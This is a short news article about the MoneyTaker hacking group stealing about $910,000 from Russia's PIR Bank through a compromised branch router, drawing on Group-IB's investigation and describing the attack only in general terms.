The Hackers group Stole $1 Million from Russian Bank.
Hacker attacks on Bank network through a vulnerable router.
Russian Cyber Security Firm investigating the incident.
The Hackers group called ‘MoneyTaker’ Stole $910,000 from Bank, this time from Russia PIR Bank. Hackers first gained access to the bank network through a vulnerable router.
How the Hackers group did the cyber attack on the Bank?
The Russian cyber security firm ‘Group-IB’ is investigating the incident and confirmed that the attack on PIR Bank started in late May 2018. The entry point was a compromised router used by one of the bank’s regional branches. The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.
To establish persistence in the banks’ systems and automate some stages of their attack, the MoneyTaker group traditionally use PowerShell scripts. This technique was analyzed in detail by Group-IB experts in their December report. When the criminals hacked the bank’s main network, they managed to gain access to AWS CBR (Automated Work Station Client of the Russian Central Bank), generate payment orders, and send money in several tranches to mule accounts prepared in advance.
However, the group tried to clear all logs from infected computers, but the cyber investigation team found ‘reverse shells’ programs that connected the hackers servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. The Hackers group were used some Malware operations, which is not stored on hard drives but exists in computer memory only.
It is not the first time!
According to Group-IB report of last November, the cyber criminal group attacks on legal firms in the US, UK and Russia including banks and financial institutions. Report says, that the hackers group hacks approximately $14 Million, Sixteen Targets in US organisation, three attacks on Russian banks and one in the UK software company.